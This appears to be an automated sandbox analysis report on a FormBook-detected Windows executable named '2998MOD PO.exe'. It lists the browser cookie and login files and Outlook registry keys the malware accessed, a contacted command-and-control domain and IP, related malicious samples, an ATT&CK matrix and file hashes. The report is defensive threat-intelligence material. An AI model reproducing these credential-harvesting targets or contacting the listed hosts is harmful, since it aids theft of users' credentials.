                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.2998MOD PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2998MOD PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560962985.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2042765684.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.2998MOD PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2998MOD PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560962985.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2042765684.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		212
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook212
                Process Injection                		NTDS113
                System Information Discovery                		Distributed Component Object ModelInput Capture2
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                2998MOD PO.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                2998MOD PO.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                http://www.fontbureau.com0%URL Reputationsafe
                http://www.fontbureau.com/designersG0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/?0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.fontbureau.com/designers?0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                http://www.fontbureau.com/designers0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.fontbureau.com/designers80%URL Reputationsafe
                http://www.fonts.com0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                ladylawher.org
                		3.33.130.190
                		truetrue
                  		unknown
                  www.ladylawher.org
                  		unknown
                  		unknownfalse
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabcolorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.02998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://www.fontbureau.com2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersG2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/?2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cn/bThe2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icocolorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://www.fontbureau.com/designers?2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.tiro.com2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.goodfont.co.kr2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.ecosia.org/newtab/colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.carterandcone.coml2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.com2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netD2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://ac.ecosia.org/autocomplete?q=colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/cabarga.htmlN2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cn/cThe2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/staff/dennis.htm2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cn2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/frere-user.html2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcolorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.jiyu-kobo.co.jp/2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/DPlease2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers82998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fonts.com2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sandoll.co.kr2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.urwpp.deDPlease2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.zhongyicts.com.cn2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sakkal.com2998MOD PO.exe, 00000000.00000002.1873899778.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=colorcpl.exe, 00000008.00000003.2230772392.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        3.33.130.190
                        		ladylawher.orgUnited States
                        		8987AMAZONEXPANSIONGBtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1542414
                        Start date and time:2024-10-25 22:08:57 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 35s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:2
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:2998MOD PO.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@9/2@1/1
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 83%
                        • Number of executed functions: 59
                        • Number of non-executed functions: 281
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • VT rate limit hit for: 2998MOD PO.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        21:09:41Task SchedulerRun new task: {C79E2195-35BD-48EB-8F1A-AFA020A41E93} path:

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3.33.130.19019387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                        • www.co2cartridges.net/rkra/
                        PO 4800040256.exeGet hashmaliciousFormBookBrowse
                        • www.ks1x7i.vip/uxh9/
                        PO 45003516.exeGet hashmaliciousFormBookBrowse
                        • www.ticketsmarche.city/jftr/
                        OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                        • www.robotcurut.xyz/37zt/
                        quotation RFQ no 123609.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                        • www.micrhyms.info/uao9/
                        Due Payment Invoice PISS2024993.exeGet hashmaliciousFormBookBrowse
                        • www.energyparks.net/24sh/
                        QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                        • www.huwin.club/cvus/
                        Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                        • www.tukaari.shop/h8b0/
                        Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                        • www.barbequecritics.com/el3s/
                        FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                        • www.wrl-llc.net/n7zc/

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        AMAZONEXPANSIONGBhttps://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29tGet hashmaliciousUnknownBrowse
                        • 52.223.40.198
                        19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                        • 3.33.130.190
                        PO 4800040256.exeGet hashmaliciousFormBookBrowse
                        • 3.33.130.190
                        PO 45003516.exeGet hashmaliciousFormBookBrowse
                        • 3.33.130.190
                        la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                        • 3.50.155.106
                        la.bot.arm.elfGet hashmaliciousUnknownBrowse
                        • 3.39.219.125
                        OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                        • 3.33.130.190
                        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                        • 160.1.253.55
                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                        • 3.41.17.239
                        http://www.thegioimoicau.com/Get hashmaliciousUnknownBrowse
                        • 3.33.220.150

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2998MOD PO.exe.log

                        Download File
                        Process:C:\Users\user\Desktop\2998MOD PO.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                        C:\Users\user\AppData\Local\Temp\Ea64OHKq

                        Download File
                        Process:C:\Windows\SysWOW64\colorcpl.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.701054610418416
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        • Win32 Executable (generic) a (10002005/4) 49.75%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Windows Screen Saver (13104/52) 0.07%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        File name:2998MOD PO.exe
                        File size:820'736 bytes
                        MD5:eba2ade6a60568538d8b918f65fa2f44
                        SHA1:fbb6cb7c1c403502560bfe74340b06f31775a7eb
                        SHA256:7b70d479034f458a6b695cc3c8aefd50c771ec183b749276aa66d18a6a33466c
                        SHA512:0cbc8cdaf8a87462fe5705370357686a8de596c07382be255f5a18e3b6668685f764f8e512f443f0e94707c2bd3b771326a156d4f2ee76d536a0c572fc9943f3
                        SSDEEP:24576:7o6pxBs45aB/DrikXJ5W7ncsu61KNAeV:tNISE/W7n7D8lV
                        TLSH:9F05BEC03B26772ADEA95B75D119DDB583F22968B040FAE25ADC3B93358D3109E0CF52
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0..z............... ........@.. ....................................@................................

                        File Icon

                        Icon Hash:90cececece8e8eb0

                        Static PE Info

                        General

                        Entrypoint:0x4c9916
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
